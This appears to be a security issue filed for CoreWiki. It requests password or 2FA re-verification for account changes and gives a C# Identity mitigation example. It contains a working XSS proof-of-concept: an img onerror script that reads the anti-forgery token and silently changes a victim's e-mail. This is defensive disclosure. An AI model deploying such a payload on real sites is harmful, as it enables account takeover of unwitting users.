CoreWiki
[Security] Require password or 2FA verification for account changes
If the site is vulnerable to XSS, an attacker could change profile information for a user without their interaction. An attacker could leave a comment on the home page that changes the user's e-mail address, requests a password reset, and then changes the user's e-mail address back to what it was. All without them knowing.
```html
<img src='nonexist.jpg' onerror="function readBody(e){var t;t=e.responseType&&'text'!==e.responseType?'document'===e.responseType?e.responseXML:e.response:e.responseText;var n=(new DOMParser).parseFromString(t,'text/html');return token=n.getElementsByName('__RequestVerificationToken')[0].value,csrf(token),t}var xhr=new XMLHttpRequest;function csrf(e){var t=new XMLHttpRequest;t.open('POST','https://localhost:44333/identity/account/manage'),t.setRequestHeader('Content-Type','application/x-www-form-urlencoded'),t.send('Input.Email=malicious_email%40testmail.com&Input.PhoneNumber=&__RequestVerificationToken='+e)}xhr.onreadystatechange=function(){4==xhr.readyState&&(response=readBody(xhr))},xhr.open('GET','https://localhost:44333/identity/account/manage',!0),xhr.send(null);" />
```
Before:

After:

Relates to #144 but should also be considered as a minimum requirement for account changes as further prevention.
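A minimal form of the requested check, as an added example rather than CoreWiki's own code: an ASP.NET Core Identity Razor PageModel for the manage page that applies e-mail and phone changes only after the current password (or an authenticator code when 2FA is enabled) has been verified. The class, property and field names here are assumptions; only the `UserManager`/`SignInManager` calls are real Identity APIs.

```csharp
using System.ComponentModel.DataAnnotations;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Identity;
using Microsoft.AspNetCore.Mvc;
using Microsoft.AspNetCore.Mvc.RazorPages;

// Hypothetical page model; everything except the Identity APIs is an assumption.
public class ManageModel : PageModel
{
    private readonly UserManager<IdentityUser> _userManager;
    private readonly SignInManager<IdentityUser> _signInManager;

    public ManageModel(UserManager<IdentityUser> um, SignInManager<IdentityUser> sm) { _userManager = um; _signInManager = sm; }

    public class InputModel
    {
        [Required, EmailAddress] public string Email { get; set; }
        [Phone] public string PhoneNumber { get; set; }
        // Re-verification secret: the current password, or an authenticator code when 2FA is on.
        [DataType(DataType.Password)] public string CurrentPassword { get; set; }
        public string TwoFactorCode { get; set; }
    }

    [BindProperty] public InputModel Input { get; set; }

    public async Task<IActionResult> OnPostAsync()
    {
        if (!ModelState.IsValid) return Page();
        var user = await _userManager.GetUserAsync(User);
        if (user == null) return Challenge();

        // A script running in the victim's session can read the anti-forgery token,
        // but it cannot supply a secret the user has to type in at that moment.
        bool verified = user.TwoFactorEnabled
            ? await _userManager.VerifyTwoFactorTokenAsync(user,
                  _userManager.Options.Tokens.AuthenticatorTokenProvider, Input.TwoFactorCode ?? "")
            : await _userManager.CheckPasswordAsync(user, Input.CurrentPassword ?? "");
        if (!verified)
        {
            ModelState.AddModelError(string.Empty, "Verification failed; no changes were applied.");
            return Page();
        }

        var result = await _userManager.SetEmailAsync(user, Input.Email);
        if (!result.Succeeded) return Page();
        await _userManager.SetPhoneNumberAsync(user, Input.PhoneNumber);
        await _signInManager.RefreshSignInAsync(user);
        return RedirectToPage();
    }
}
```

The same gate belongs on every handler that edits account data (password change, 2FA setup, external logins), not only the e-mail form the payload above targets.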